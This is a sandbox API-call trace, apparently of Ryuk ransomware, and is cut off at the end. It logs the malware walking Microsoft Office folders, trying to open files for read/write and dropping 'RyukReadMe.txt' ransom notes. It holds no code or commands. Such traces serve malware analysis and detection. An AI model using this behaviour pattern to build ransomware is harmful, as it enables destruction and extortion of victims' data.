VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF", dwFileAttributes=0x80) returned 0 [0135.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21348_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.998] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.998] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.998] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF", dwFileAttributes=0x80) returned 0 [0135.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21370_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.998] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.998] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.998] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF", dwFileAttributes=0x80) returned 0 [0135.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21390_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.999] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.999] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.999] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.999] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF", dwFileAttributes=0x80) returned 0 [0136.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21413_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.000] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.000] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.000] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.000] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF", dwFileAttributes=0x80) returned 0 [0136.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21427_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.000] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.000] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.001] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.001] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF", dwFileAttributes=0x80) returned 0 [0136.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21448_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.001] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.001] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.001] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.001] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF", dwFileAttributes=0x80) returned 0 [0136.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21495_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.001] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.002] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF", dwFileAttributes=0x80) returned 0 [0136.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21512_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.002] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF", dwFileAttributes=0x80) returned 0 [0136.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21527_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.003] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.003] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.003] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF", dwFileAttributes=0x80) returned 0 [0136.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21548_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.003] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.003] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.003] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF", dwFileAttributes=0x80) returned 0 [0136.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115855.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.004] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.004] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.004] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.004] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF", dwFileAttributes=0x80) returned 0 [0136.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115856.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.004] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.004] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.004] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF", dwFileAttributes=0x80) returned 0 [0136.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115875.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.005] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.005] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.005] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF", dwFileAttributes=0x80) returned 0 [0136.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115876.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.005] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.005] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.006] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.006] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.006] SetLastError (dwErrCode=0x0) [0136.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.009] GetLastError () returned 0x5 [0136.009] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.009] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.009] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.009] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.009] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.009] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW", dwFileAttributes=0x80) returned 0 [0136.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.010] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.010] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.010] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.010] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.010] SetLastError (dwErrCode=0x0) [0136.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.011] GetLastError () returned 0x5 [0136.011] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.011] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0136.011] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0136.011] SetLastError (dwErrCode=0x0) [0136.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.011] GetLastError () returned 0x5 [0136.011] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0136.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.011] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0136.011] SetLastError (dwErrCode=0x0) [0136.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.011] GetLastError () returned 0x5 [0136.011] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0136.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.011] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0136.011] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.013] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.013] SetLastError (dwErrCode=0x0) [0136.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.014] GetLastError () returned 0x5 [0136.014] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.014] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.015] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.015] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.015] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.015] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC", dwFileAttributes=0x80) returned 0 [0136.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.016] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.016] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.016] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.016] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.016] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.016] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP", dwFileAttributes=0x80) returned 0 [0136.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.017] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.017] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.018] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.018] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.018] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL", dwFileAttributes=0x80) returned 0 [0136.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.021] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.021] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.021] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.021] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL", dwFileAttributes=0x80) returned 0 [0136.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.022] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.022] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.022] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.022] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD", dwFileAttributes=0x80) returned 0 [0136.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.023] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.023] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.023] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.023] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM", dwFileAttributes=0x80) returned 0 [0136.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\basic.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.024] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.024] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.024] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.024] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.024] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.024] SetLastError (dwErrCode=0x0) [0136.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.025] GetLastError () returned 0x5 [0136.025] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.025] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.025] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.026] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.026] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.026] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML", dwFileAttributes=0x80) returned 0 [0136.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\bibform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 